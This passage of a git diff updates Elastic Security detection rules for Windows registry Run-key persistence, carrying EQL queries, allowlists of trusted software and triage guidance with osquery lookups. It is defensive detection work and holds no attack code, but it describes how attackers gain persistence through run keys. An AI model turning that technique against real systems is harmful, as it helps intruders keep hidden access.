accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json index 14de65aa45c..902582d9e93 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Slack Technologies, Inc.\" and\n process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json index 639d6519603..171f7c6216d 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n 